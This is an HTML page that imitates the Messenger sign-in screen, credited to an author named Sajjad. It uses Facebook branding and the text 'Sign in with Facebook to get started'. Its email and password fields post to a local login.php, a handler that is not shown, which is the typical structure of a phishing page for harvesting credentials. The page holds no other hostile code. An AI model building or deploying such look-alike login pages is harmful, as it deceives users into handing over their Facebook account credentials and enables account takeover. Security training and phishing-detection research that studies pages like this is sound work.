<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta http-equiv="X-UA-Compatible" content="ie=edge">
	<title>Log in to Messenger</title>
	<!-- Author: Sajjad -->
	<style>
	body {
		width: 100vw;
		height: 100vh;
		background-color: white;
		color: black;
	}
	
	.logo {
		width: 80px;
		display: flex;
		margin: auto;
		margin-top: 60px;
	}
	
	#p1 {
		font-family: arial;
		font-size: 30px;
		text-align: center;
		margin: 15px auto;
	}
	
	#p2 {
		font-family: arial;
		text-align: center;
		margin: auto;
	}
	
	.input-box {
		text-align: center;
		margin: 50px auto;
	}
	
	#username {
		padding: 10px 61px;
		margin: 8px auto;
	}
	
	#password {
		padding: 10px 61px;
	}
	
	.login {
		width: 100vw;
		margin: auto;
		text-align: center;
	}
	#login-btn {
		position: relative;
		width: 23em;
		 padding: 10px;
		 margin: auto;
		 top: -40px;
		 background-color: #0099ff;
		 border: none;
		 color: white;
		 font-weight: bold;
	}
	
	.checkbox {
		font-family: arial;
		text-align: center;
		margin: -20px auto;
	}
	</style>
</head>
<body>
	<div>
		<img class="logo" src="Image/logo.png" alt="Messenger"/>
	</div>
	<div>
		<p id="p1">Messenger</p>
	</div>
	<div>
	<p id="p2">Sign in with Facebook to get started.</p>
	</div>
	<form method="post" action="login.php">
	<div class="input-box">
		<div class="box-1">
			<input id="username" type="text" name="username" placeholder="Email address or phone number"></input>
		</div>
		<div class="box-2">
			<input id="password" type="password" name="password" placeholder="Password"></input>
		</div>
	</div>
	<div class="login">
		<button id="login-btn" type="submit">Sign In</button>
	</div>
	<div class="checkbox">
		<input type="checkbox" name="checkbox">Keep me signed in</input>
	</div>
	</form>
</body>
</html>